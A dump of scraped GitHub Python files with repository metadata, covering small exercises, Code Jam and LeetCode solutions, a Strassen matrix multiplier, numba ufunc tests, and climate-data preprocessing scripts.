3a1be8b5f004ecaa5b1073b7bea1ccae15e324b7 | 40c4b8e9ac9074869bfb0dc1d3c3f566371f1764 | /Hangman1/rectangle3.py | 7082113cadbd1e910a7297d1e81a0b0631f390f4 | [] | no_license | katuhito/Hangman001 | 870a8827e69cbd9a8b01ffb55f5c499c71861b76 | 710a201c6ad8284e164ea8ad26cd061486c50849 | refs/heads/master | 2022-12-06T16:30:24.613288 | 2020-08-22T10:19:27 | 2020-08-22T10:19:27 | 285,448,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py | class Rectangle:
def __init__(self, w, l):
self.width = w
self.len = l
def print_size(self):
print("{} by {}".format(self.width, self.len))
# Demo: build a 10-by-24 rectangle (its size is printed on the next line).
my_rectangle = Rectangle(10, 24)
my_rectangle.print_size()
| [
"katuhitohara@gmail.com"
] | katuhitohara@gmail.com |
a2b1d622e04da9f379ad7dec5d7160a7df4cb382 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_200/5220.py | 3953bab56b760965dae521faab27b88c6280402e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | f = open("test.txt")
# Google Code Jam "Tidy Numbers": for each test case, find the largest
# number <= n whose digits are in non-decreasing order, by brute-force
# countdown from n.
o = open("final.txt", 'w')
t = int(f.readline())
for i in range(t):
    n = int(f.readline())
    while n>0:
        # n is "tidy" exactly when sorting its digits leaves it unchanged.
        if int(''.join(sorted(list(str(n))))) == n:
            o.write("Case #{}: {}\n".format(i+1,n))
            break
        else:
            n -= 1
# NOTE(review): neither f nor o is ever closed, so the output file may stay
# unflushed until interpreter exit; a `with` block would be safer.
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
bbf1b8bfc58b8fa0bb3231f35c168ee5235006e9 | 0fea8a6421fe5f5967f2202910022c2bfd277b4d | /190.生成字典.py | 51461ae593ab4ecd836413dd315ba3b0b9c3f9a8 | [] | no_license | maohaoyang369/Python_exercise | 4dc10ec061aa0de2bcfe59c86be115e135fb3fab | 8fbee8854db76d09e2b1f9365ff55198ddabd595 | refs/heads/master | 2020-04-09T23:04:02.327118 | 2019-09-05T14:49:07 | 2019-09-05T14:49:07 | 160,646,057 | 0 | 2 | null | 2019-03-21T14:44:13 | 2018-12-06T08:50:19 | Python | UTF-8 | Python | false | false | 498 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# 生成字典{“a”:1,”c”:3,”e”:5,”g”:7,”i”:9}
import string
# Build {"a": 1, "c": 3, "e": 5, "g": 7, "i": 9}: every second letter of
# "abcdefghi" mapped to its 1-based position.
letters = string.ascii_letters[0:9]
result = {letters[i]: i + 1 for i in range(0, len(letters), 2)}
print(result)
# Join the dict's keys and values into a single string.  The exercise
# forbids the string concatenation operator (+), so use str.join -- the
# original solution used +=, which violated that constraint.
sentence = {'a': 1, 'c': 3, 'e': 5, 'g': 7, 'i': 9}
result = "".join("{}{}".format(m, n) for m, n in sentence.items())
print(result)
| [
"372713573@qq.com"
] | 372713573@qq.com |
9848f1253781378294034070b41e90cb3b18980e | 524b2ef7ace38954af92a8ed33e27696f4f69ece | /montecarlo4fms/utils/mctsstats_its.py | 9a7cf4b70cb928340f7e17db07c8bbccd33a7734 | [] | no_license | jmhorcas/montecarlo_analysis | ebf9357b0ede63aa9bcdadb6a5a30a50ad7460eb | 2319838afb0f738125afc081fc4b58a0d8e2faee | refs/heads/main | 2023-06-24T19:05:36.485241 | 2021-07-20T08:24:06 | 2021-07-20T08:24:06 | 363,059,338 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,978 | py | from montecarlo4fms.models import State
class MCTSStatsIts():
    """Per-iteration statistics of a Monte Carlo tree search run, keyed by
    simulation count and serializable as a CSV-like text file."""

    ROUND_DECIMALS = 2

    # Column names, and the order in which serialize() writes them.
    METHOD_STR = 'Method'
    ITERATIONS_STR = 'Iterations'
    STEPS_STR = 'Decisions'
    SIMULATIONS_STR = 'Simulations'
    EVALUATIONS_STR = 'Evaluations'
    POSITIVE_EVALUATIONS_STR = 'PositiveEvaluations'
    PERCENTAGE_POSITIVE_EVALUATIONS_STR = 'Percentage'
    TREESIZE_STR = 'TreeSize'
    TIME_STR = 'Time'
    HEADER = [METHOD_STR, ITERATIONS_STR, STEPS_STR, SIMULATIONS_STR, EVALUATIONS_STR, POSITIVE_EVALUATIONS_STR, PERCENTAGE_POSITIVE_EVALUATIONS_STR, TREESIZE_STR, TIME_STR]

    def __init__(self):
        # One row per recorded step: {simulation count: {column name: value}}.
        self.stats = {}

    def add_step(self, method: str, steps: int, mcts_tree_search: dict, simulations: int, evaluations: int, positive_evaluations: int, time: float):
        """Record one measurement row, keyed by its simulation count."""
        if mcts_tree_search is None:
            tree_size = 0
        else:
            tree_size = len(mcts_tree_search)
        self.stats[simulations] = {
            MCTSStatsIts.METHOD_STR: f'"{method}"',
            MCTSStatsIts.STEPS_STR: steps,
            MCTSStatsIts.ITERATIONS_STR: simulations,
            MCTSStatsIts.SIMULATIONS_STR: simulations,
            MCTSStatsIts.EVALUATIONS_STR: evaluations,
            MCTSStatsIts.POSITIVE_EVALUATIONS_STR: positive_evaluations,
            MCTSStatsIts.PERCENTAGE_POSITIVE_EVALUATIONS_STR: float(positive_evaluations) / float(evaluations),
            MCTSStatsIts.TREESIZE_STR: tree_size,
            MCTSStatsIts.TIME_STR: time,
        }

    def serialize(self, filepath: str):
        """Write the header plus all rows (sorted by iteration count)."""
        with open(filepath, 'w+') as output:
            output.write(f"{', '.join(MCTSStatsIts.HEADER)}\n")
            for its in sorted(self.stats):
                row = self.stats[its]
                output.write(f"{', '.join(str(row[h]) for h in MCTSStatsIts.HEADER)}\n")
| [
"jhorcas@us.es"
] | jhorcas@us.es |
7e2aca3f77a73d466a4da4a18a7e0bc5683a0fe4 | 3c30d27bf5856dcdbc689dd01ed12ae007fc5b07 | /dorandoran/config/settings/__init__.py | 02f06ea5d084ca462743c9fabf93e6fe6b7766ef | [] | no_license | Doran-Doran-development/DoranDoran-Server-2 | 047ff79a6cc472364b2bf6507d89617832e1571c | 6340af1b887e08270bee0e13029ee41df7dfeb1e | refs/heads/master | 2023-06-06T14:44:27.891110 | 2021-05-19T15:05:14 | 2021-05-19T15:05:14 | 346,971,795 | 11 | 0 | null | 2021-06-11T01:00:18 | 2021-03-12T06:58:34 | Python | UTF-8 | Python | false | false | 160 | py | import os
# Name of the explicitly selected Django settings module, if any.
SETTINGS_MODULE = os.environ.get("DJANGO_SETTINGS_MODULE")
# Fall back to the local development settings when no settings module was
# chosen, or when it points at this bare package itself.
if not SETTINGS_MODULE or SETTINGS_MODULE == "config.settings":
    from .local import *
| [
"hanbin8269@gmail.com"
] | hanbin8269@gmail.com |
3dbbc772a56fbcb69c3df9317f21fe380939b860 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/02_preprocessing/merraLagScripts/392-tideGauge.py | bf4ff8cf2ba0191d209994b7caa2338c79b66107 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
# dir_name = 'F:\\01_erainterim\\03_eraint_lagged_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraAllCombined"
dir_out = "/lustre/fs0/home/mtadesse/merraAllLagged"
def lag():
    """Append hourly-lagged copies of the predictor time stamps to one
    tide-gauge CSV and save the widened table.

    For the selected file in dir_in: build a daily date index spanning the
    record, create 31 hourly-shifted string versions of that index (lags
    0..30 hours), right-merge the original predictors onto each shifted
    index in turn, and write the concatenated result to dir_out under the
    same file name.
    """
    os.chdir(dir_in)
    #get names
    tg_list_name = sorted(os.listdir())
    # NOTE(review): hard-coded slice -- this run processes only station #392.
    x = 392
    y = 393
    for tg in range(x, y):
        os.chdir(dir_in)
        tg_name = tg_list_name[tg]
        print(tg_name, '\n')
        pred = pd.read_csv(tg_name)
        #create a daily time series - date_range
        #get only the ymd of the start and end times
        start_time = pred['date'][0].split(' ')[0]
        end_time = pred['date'].iloc[-1].split(' ')[0]
        print(start_time, ' - ', end_time, '\n')
        date_range = pd.date_range(start_time, end_time, freq = 'D')
        #defining time changing lambda functions
        time_str = lambda x: str(x)
        time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
        time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
        """
        first prepare the six time lagging dataframes
        then use the merge function to merge the original
        predictor with the lagging dataframes
        """
        #prepare lagged time series for time only
        #note here that since MERRA has 3hrly data
        #the lag_hrs is increased from 6(eraint) to 31(MERRA)
        time_lagged = pd.DataFrame()
        lag_hrs = list(range(0, 31))
        # NOTE(review): the loop variable `lag` shadows this function's name;
        # harmless here because the function never calls itself.
        for lag in lag_hrs:
            lag_name = 'lag'+str(lag)
            lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
            lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
                                   columns = [lag_name])
            time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        #dataframe that contains all lagged time series (just time)
        time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
        pred_lagged = pd.DataFrame()
        for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
            print(time_all.columns[ii])
            #extracting corresponding lag time series
            lag_ts = pd.DataFrame(time_all.iloc[:,ii])
            lag_ts.columns = ['date']
            #merge the selected lagged time with the predictor on = "date"
            pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
            pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
            #sometimes nan values go to the bottom of the dataframe
            #sort df by date -> reset the index -> remove old index
            pred_new.sort_values(by = 'date', inplace=True)
            pred_new.reset_index(inplace=True)
            pred_new.drop('index', axis = 1, inplace= True)
            #concatenate lagged dataframe
            if ii == 1:
                pred_lagged = pred_new
            else:
                pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
        #cd to saving directory
        os.chdir(dir_out)
        pred_lagged.to_csv(tg_name)
        os.chdir(dir_in)
#run script
lag()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
415734380444d4ca699f0a861cd5aedd158602cc | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/577484_PRNG_Test/recipe-577484.py | 5f08e97722809089c21f45f274f0c10b6d28c1c0 | [
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 1,669 | py | # PRNG (Pseudo-Random Number Generator) Test
# PRNG info:
# http://en.wikipedia.org/wiki/Pseudorandom_number_generator
# FB - 201012046
# Compares output distribution of any given PRNG
# w/ an hypothetical True-Random Number Generator (TRNG)
import math
import time
global x
x = time.clock() # seed for the PRNG
# PRNG to test
def prng():
    """Advance the generator and return the next pseudo-random float in [0, 1).

    The state lives in the module-level ``x``: each call shifts it by pi,
    squares it, and keeps only the fractional part.
    """
    global x
    shifted = x + math.pi
    x = math.fmod(shifted ** 2.0, 1.0)
    return x
# combination by multiplicative method (iterative, O(k))
def c(n, k):
    """Binomial coefficient C(n, k) ("n choose k").

    Replaces the exponential-time recursion c(n-1, k-1) + c(n-1, k) with the
    multiplicative product (the approach sketched in the commented-out ``c_``
    below), using exact integer arithmetic.  Matches the recursive version's
    conventions: C(n, 0) == 1 for any n, and 0 when k is negative or k > n.
    """
    if k == 0:
        return 1
    if k < 0 or k > n:
        return 0
    # Use the symmetry C(n, k) == C(n, n - k) to minimize the loop length.
    result = 1
    for i in range(min(k, n - k)):
        # The running product is always divisible by (i + 1), so // is exact.
        result = result * (n - i) // (i + 1)
    return result
### combination by multiplicative method
##def c_(n, k):
## mul = 1.0
## for i in range(k):
## mul = mul * (n - k + i + 1) / (i + 1)
## return mul
# MAIN
# Empirically compare the PRNG's distribution of zero-bit counts per n-bit
# word against the binomial counts C(n, k) an ideal random source would give.
n = 20 # number of bits in each trial
print 'Test in progress...'
print
cnk = [] # array to hold bit counts
for k in range(n + 1):
    cnk.append(0)
# generate 2**n n-bit pseudo-random numbers
for j in range(2 ** n):
    # generate n-bit pseudo-random number and count the 0's in it
    # num = ''
    ctr = 0
    for i in range(n):
        b = int(round(prng())) # generate 1 pseudo-random bit
        # num += str(b)
        if b == 0: ctr += 1
    # print num
    # increase bit count in the array
    cnk[ctr] += 1
print 'Number of bits in each pseudo-random number (n) =', n
print
print 'Comparison of "0" count distributions:'
print
print ' k', ' c(n,k)', ' actual', '%dif'
difSum = 0
for k in range(n + 1):
    cnk_ = c(n, k) # expected count for a true RNG is exactly C(n, k)
    dif = abs(cnk_ - cnk[k])
    # NOTE: Python-2 integer division truncates the percentage below.
    print '%2d %10d %10d %4d' % (k, cnk_, cnk[k], 100 * dif / cnk_)
    difSum += dif
print
print 'Difference percentage between the distributions:'
print 100 * difSum / (2 ** n)
| [
"betty@qburst.com"
] | betty@qburst.com |
c3cb877e4a914b3e92f3fc6e05594d2242f19825 | f30f5024e2e9ce0dc5e550f7125bb7072fe96207 | /2019/r1a/prob2.py | 1baf96bf5ed1273a8b2431b64dcf1965199fdc76 | [] | no_license | RZachLamberty/google_code_jam | fcb14efed46c93cdc655ed932b6e3076bbe5b3ca | 0e1541db004ac47df5b63dd88f3e182a7a35e768 | refs/heads/master | 2021-12-01T02:04:32.506653 | 2021-11-16T20:33:04 | 2021-11-16T20:33:04 | 253,242,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,173 | py | import sys
def main():
T, N, M = [int(_) for _ in input().split(' ')]
for i_test_case in range(T):
options = None
lower_bound = 0
answer = '-1'
for n in [17, 16, 13, 11, 7, 5, 3]:
print(' '.join([str(n) for i in range(18)]))
sys.stdout.flush()
x = sum([int(_) for _ in input().split(' ')])
lower_bound = max(lower_bound, x)
mod = x % n
options_now = {i for i in range(lower_bound, M + 1) if i % n == mod}
if options is None:
options = options_now
else:
options.intersection_update(options_now)
# debug
# print("for me: len(options) = {}".format(len(options)))
# if len(options) < 10:
# print('options = {}'.format(options))
if len(options) == 1:
# guess
print(options.pop())
sys.stdout.flush()
answer = input()
break
if answer == '1':
continue
elif answer == '-1':
exit(1)
if __name__ == '__main__':
main()
| [
"r.zach.lamberty@gmail.com"
] | r.zach.lamberty@gmail.com |
e3bc4f76cf3ffb6a5b4786f53d8ebd7ebc637a52 | e6328c5076fe0f1b6819c3eacca08e1c4791199b | /062. Unique Paths/62. Unique Paths.py | 959174bdcbc2488be43001c17cf9725c173b9ad9 | [] | no_license | 603lzy/LeetCode | 16e818d94282b34ac153271697b512c79fc95ef5 | 9752533bc76ce5ecb881f61e33a3bc4b20dcf666 | refs/heads/master | 2020-06-14T03:07:03.148542 | 2018-10-22T14:10:33 | 2018-10-22T14:10:33 | 75,514,162 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | class Solution(object):
def uniquePaths(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
https://discuss.leetcode.com/topic/67900/dp-solution-in-python
# basic dynamic programming
"""
if m > 1 and n > 1:
grid = [[0 for col in xrange(n)] for row in xrange(m)]
for row in xrange(1, m):
grid[row][0] = 1
for col in xrange(1, n):
grid[0][col] = 1
for row in xrange(1, m):
for col in xrange(1, n):
grid[row][col] = grid[row][col - 1] + grid[row - 1][col]
return grid[m - 1][n - 1]
elif not m or not n:
return 0
else: # m = 1 or n = 1
return 1
| [
"noreply@github.com"
] | 603lzy.noreply@github.com |
6fd670ab5d1d479388517eba0c9275c274d3df7a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_implemented.py | c8115b06a1c54a5a564f83c1619336ef47f28f30 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py |
#calss header
class _IMPLEMENTED():
def __init__(self,):
self.name = "IMPLEMENTED"
self.definitions = implement
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['implement']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
4606de08215d1e56e7f12b7187c4aec33337463e | 35f9def6e6d327d3a4a4f2959024eab96f199f09 | /developer/lab/ipython/tools/strassen_matrix_multiplication.py | 67c5a531feb4fea827e9edaf8764fa85bfef969d | [
"CAL-1.0-Combined-Work-Exception",
"CAL-1.0",
"MIT",
"CC-BY-SA-4.0",
"LicenseRef-scancode-free-unknown"
] | permissive | arXiv-research/DevLab-III-1 | ec10aef27e1ca75f206fea11014da8784752e454 | c50cd2b9154c83c3db5e4a11b9e8874f7fb8afa2 | refs/heads/main | 2023-04-16T19:24:58.758519 | 2021-04-28T20:21:23 | 2021-04-28T20:21:23 | 362,599,929 | 2 | 0 | MIT | 2021-04-28T20:36:11 | 2021-04-28T20:36:11 | null | UTF-8 | Python | false | false | 6,011 | py | from __future__ import annotations
import math
def default_matrix_multiplication(a: list, b: list) -> list:
    """
    Multiplication only for 2x2 matrices (the recursion's base case).
    """
    if len(a) != 2 or len(a[0]) != 2 or len(b) != 2 or len(b[0]) != 2:
        raise Exception("Matrices are not 2x2")
    # Unpack the entries once for readability, then apply the textbook formula.
    (a00, a01), (a10, a11) = a
    (b00, b01), (b10, b11) = b
    return [
        [a00 * b00 + a01 * b10, a00 * b01 + a01 * b11],
        [a10 * b00 + a11 * b10, a10 * b01 + a11 * b11],
    ]
def matrix_addition(matrix_a: list, matrix_b: list):
    """Element-wise sum of two matrices (assumed to have equal shapes)."""
    return [
        [x + y for x, y in zip(row_a, row_b)]
        for row_a, row_b in zip(matrix_a, matrix_b)
    ]
def matrix_subtraction(matrix_a: list, matrix_b: list):
    """Element-wise difference matrix_a - matrix_b (equal shapes assumed)."""
    return [
        [x - y for x, y in zip(row_a, row_b)]
        for row_a, row_b in zip(matrix_a, matrix_b)
    ]
def split_matrix(a: list) -> tuple[list, list, list, list]:
    """
    Given an even length (square) matrix, return its four quadrants as
    (top_left, top_right, bot_left, bot_right).

    >>> split_matrix([[4,3,2,4],[2,3,1,1],[6,5,4,3],[8,4,1,6]])
    ([[4, 3], [2, 3]], [[2, 4], [1, 1]], [[6, 5], [8, 4]], [[4, 3], [1, 6]])
    """
    if len(a) % 2 != 0 or len(a[0]) % 2 != 0:
        raise Exception("Odd matrices are not supported!")
    size = len(a)
    mid = size // 2
    # Slice rows into top/bottom halves, and each row into left/right halves.
    top_left = [row[:mid] for row in a[:mid]]
    top_right = [row[mid:size] for row in a[:mid]]
    bot_left = [row[:mid] for row in a[mid:size]]
    bot_right = [row[mid:size] for row in a[mid:size]]
    return top_left, top_right, bot_left, bot_right
def matrix_dimensions(matrix: list) -> tuple[int, int]:
    """Return (row count, column count) of *matrix*."""
    rows = len(matrix)
    cols = len(matrix[0])
    return rows, cols
def print_matrix(matrix: list) -> None:
    """Print the matrix one row per line (debug helper)."""
    # Iterate the rows directly instead of indexing via range(len(...)).
    for row in matrix:
        print(row)
def actual_strassen(matrix_a: list, matrix_b: list) -> list:
    """
    Recursively multiply two equal-size, power-of-two square matrices with
    Strassen's algorithm: seven half-size products instead of eight, combined
    into the four quadrants of the result.  2x2 inputs use the direct formula.
    """
    if matrix_dimensions(matrix_a) == (2, 2):
        return default_matrix_multiplication(matrix_a, matrix_b)

    a, b, c, d = split_matrix(matrix_a)
    e, f, g, h = split_matrix(matrix_b)

    # Strassen's seven products (M1..M7 in most textbooks).
    p1 = actual_strassen(a, matrix_subtraction(f, h))
    p2 = actual_strassen(matrix_addition(a, b), h)
    p3 = actual_strassen(matrix_addition(c, d), e)
    p4 = actual_strassen(d, matrix_subtraction(g, e))
    p5 = actual_strassen(matrix_addition(a, d), matrix_addition(e, h))
    p6 = actual_strassen(matrix_subtraction(b, d), matrix_addition(g, h))
    p7 = actual_strassen(matrix_subtraction(a, c), matrix_addition(e, f))

    top_left = matrix_addition(matrix_subtraction(matrix_addition(p5, p4), p2), p6)
    top_right = matrix_addition(p1, p2)
    bot_left = matrix_addition(p3, p4)
    bot_right = matrix_subtraction(matrix_subtraction(matrix_addition(p1, p5), p3), p7)

    # Stitch the four quadrants back into one matrix, row by row.
    upper = [left + right for left, right in zip(top_left, top_right)]
    lower = [left + right for left, right in zip(bot_left, bot_right)]
    return upper + lower
def strassen(matrix1: list, matrix2: list) -> list:
    """
    Multiply two matrices of arbitrary compatible dimensions via Strassen.

    The inputs are padded with zero rows/columns up to the next power of two
    so the recursion can split evenly; the padding is trimmed before return.

    >>> strassen([[2,1,3],[3,4,6],[1,4,2],[7,6,7]], [[4,2,3,4],[2,1,1,1],[8,6,4,2]])
    [[34, 23, 19, 15], [68, 46, 37, 28], [28, 18, 15, 12], [96, 62, 55, 48]]
    >>> strassen([[3,7,5,6,9],[1,5,3,7,8],[1,4,4,5,7]], [[2,4],[5,2],[1,7],[5,5],[7,8]])
    [[139, 163], [121, 134], [100, 121]]
    """
    if matrix_dimensions(matrix1)[1] != matrix_dimensions(matrix2)[0]:
        raise Exception(
            f"Unable to multiply these matrices, please check the dimensions. \n"
            f"Matrix A:{matrix1} \nMatrix B:{matrix2}"
        )
    dimension1 = matrix_dimensions(matrix1)
    dimension2 = matrix_dimensions(matrix2)

    # BUG FIX: the original returned ``[matrix1, matrix2]`` — the *unmultiplied
    # inputs* — whenever both matrices happened to be square, so e.g. a 4x4
    # times 4x4 product was never computed.  Square inputs now go through the
    # normal pad-and-recurse path like everything else.

    maximum = max(max(dimension1), max(dimension2))
    maxim = int(math.pow(2, math.ceil(math.log2(maximum))))

    # BUG FIX: pad *copies* of the inputs.  The original aliased the callers'
    # row lists and appended zeros in place, leaving the arguments mutated
    # after the call.
    new_matrix1 = [row[:] for row in matrix1]
    new_matrix2 = [row[:] for row in matrix2]
    for i in range(0, maxim):
        if i < dimension1[0]:
            new_matrix1[i].extend([0] * (maxim - dimension1[1]))
        else:
            new_matrix1.append([0] * maxim)
        if i < dimension2[0]:
            new_matrix2[i].extend([0] * (maxim - dimension2[1]))
        else:
            new_matrix2.append([0] * maxim)

    final_matrix = actual_strassen(new_matrix1, new_matrix2)

    # Trim the zero padding: keep dimension1[0] rows x dimension2[1] columns.
    return [final_matrix[i][: dimension2[1]] for i in range(dimension1[0])]
if __name__ == "__main__":
    # Demo: multiply a 10x4 matrix by a 4x4 matrix and print the 10x4 result.
    matrix1 = [
        [2, 3, 4, 5],
        [6, 4, 3, 1],
        [2, 3, 6, 7],
        [3, 1, 2, 4],
        [2, 3, 4, 5],
        [6, 4, 3, 1],
        [2, 3, 6, 7],
        [3, 1, 2, 4],
        [2, 3, 4, 5],
        [6, 2, 3, 1],
    ]
    matrix2 = [[0, 2, 1, 1], [16, 2, 3, 3], [2, 2, 7, 7], [13, 11, 22, 4]]
    print(strassen(matrix1, matrix2))
| [
"noreply@github.com"
] | arXiv-research.noreply@github.com |
cb5bd12ced8e3fde3e7611f283a940a293a4b659 | 0c8214d0d7827a42225b629b7ebcb5d2b57904b0 | /practice/P009_Fibonacci/main.py | 1b7ef28e71516019aa48df1f633f869dc72b79a3 | [] | no_license | mertturkmenoglu/python-examples | 831b54314410762c73fe2b9e77aee76fe32e24da | 394072e1ca3e62b882d0d793394c135e9eb7a56e | refs/heads/master | 2020-05-04T15:42:03.816771 | 2020-01-06T19:37:05 | 2020-01-06T19:37:05 | 179,252,826 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | # Dynamic programming example
fib_numbers = {1: 1, 2: 1, 3: 2}
def fibonacci(n: int) -> int:
if n not in fib_numbers:
fib_numbers[n] = fibonacci(n - 1) + fibonacci(n - 2)
return fib_numbers[n]
print(fibonacci(7))
print(fibonacci(5))
| [
"mertturkmenoglu99@gmail.com"
] | mertturkmenoglu99@gmail.com |
d669bec0e43de88d1d1a0659b251032840574b22 | 4388363ba45b95910c25bae3d9c02ad78f4a75d6 | /python/anaconda/lib/python2.7/site-packages/numba/tests/npyufunc/test_parallel_ufunc_issues.py | da86964467145527252c07a10e6ad5b9f1969a73 | [
"Python-2.0"
] | permissive | locolucco209/MongoScraper | d494e02531f4f165b1e821633dc9661c579337b5 | 74476c9f00ee43338af696da7e9cd02b273f9005 | refs/heads/master | 2022-11-25T19:09:27.248747 | 2018-07-10T03:54:06 | 2018-07-10T03:54:06 | 137,553,786 | 3 | 1 | null | 2022-11-16T04:32:26 | 2018-06-16T04:49:22 | null | UTF-8 | Python | false | false | 2,600 | py | from __future__ import print_function, absolute_import, division
import time
import ctypes
import numpy as np
from numba import unittest_support as unittest
from numba.tests.support import captured_stdout
from numba import vectorize
class TestParUfuncIssues(unittest.TestCase):
    """Regression tests for numba's parallel-target ufunc worker threads."""

    def test_thread_response(self):
        """
        Related to #89.
        This does not test #89 but tests the fix for it.
        We want to make sure the worker threads can be used multiple times
        and with different time gap between each execution.
        """
        @vectorize('float64(float64, float64)', target='parallel')
        def fnv(a, b):
            return a + b

        # Exercise the pool with exponentially shrinking idle gaps between
        # launches, from 1 s down past 10 us.
        sleep_time = 1  # 1 second
        while sleep_time > 0.00001:  # 10us
            time.sleep(sleep_time)
            a = b = np.arange(10**5)
            np.testing.assert_equal(a + b, fnv(a, b))
            # Reduce sleep time
            sleep_time /= 2

    def test_gil_reacquire_deadlock(self):
        """
        Testing issue #1998 due to GIL reacquiring
        """
        # make a ctypes callback that requires the GIL
        proto = ctypes.CFUNCTYPE(None, ctypes.c_int32)
        characters = 'abcdefghij'

        def bar(x):
            print(characters[x])

        cbar = proto(bar)

        # our unit under test
        @vectorize(['int32(int32)'], target='parallel', nopython=True)
        def foo(x):
            print(x % 10)  # this reacquires the GIL
            cbar(x % 10)   # this reacquires the GIL
            return x * 2

        # Numpy ufunc has a heuristic to determine whether to release the GIL
        # during execution. Small input size (10) seems to not release the GIL.
        # Large input size (1000) seems to release the GIL.
        for nelem in [1, 10, 100, 1000]:
            # inputs
            a = np.arange(nelem, dtype=np.int32)
            acopy = a.copy()
            # run and capture stdout
            with captured_stdout() as buf:
                got = foo(a)
                stdout = buf.getvalue()
            buf.close()
            # process outputs from print (order is nondeterministic across
            # threads, so compare sorted lines)
            got_output = sorted(map(lambda x: x.strip(), stdout.splitlines()))
            # build expected output
            expected_output = [str(x % 10) for x in range(nelem)]
            expected_output += [characters[x % 10] for x in range(nelem)]
            expected_output = sorted(expected_output)
            # verify
            self.assertEqual(got_output, expected_output)
            np.testing.assert_equal(got, 2 * acopy)


if __name__ == '__main__':
    unittest.main()
| [
"lukemassetti@WestSide-Luke.local"
] | lukemassetti@WestSide-Luke.local |
4c8cb75900b6afaeafb66fec408097baedf5d1cc | 33f32d78087491e989289c46e5d2df5400e23946 | /leetcode/Unsorted_Algorthm_Problems/Two_Sum_III _Data_structure_design.py | ab9d7045ac0bbbde6e34441cdc36885146a1b6d5 | [] | no_license | xulleon/algorithm | 1b421989423640a44339e6edb21c054b6eb47a30 | b1f93854006a9b1e1afa4aadf80006551d492f8a | refs/heads/master | 2022-10-08T19:54:18.123628 | 2022-09-29T05:05:23 | 2022-09-29T05:05:23 | 146,042,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | # https://leetcode.com/problems/two-sum-iii-data-structure-design/
class TwoSum:

    def __init__(self):
        """
        Initialize your data structure here.

        ``numbers`` maps each added value to its occurrence count.
        """
        self.numbers = {}

    def add(self, number: int) -> None:
        """
        Add the number to an internal data structure.  O(1).
        """
        # dict.get with a default replaces the original membership check.
        self.numbers[number] = self.numbers.get(number, 0) + 1

    def find(self, value: int) -> bool:
        """
        Find if there exists any pair of numbers which sum is equal to the value.

        O(k) over distinct stored numbers: look up each number's complement;
        a number may pair with itself only if it was added at least twice.
        """
        # Iterate items() so the count is available without a second lookup.
        for number, count in self.numbers.items():
            complement = value - number
            if complement != number:
                if complement in self.numbers:
                    return True
            elif count > 1:
                # value == 2 * number needs two copies of the same number.
                return True
        return False
| [
"leonxu@yahoo.com"
] | leonxu@yahoo.com |
d9cb29925147bcc00f6eeef81143924403f0db3e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03288/s528258523.py | e21295af8dcf6d86de0facff0a4bceaed3804dab | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | import sys
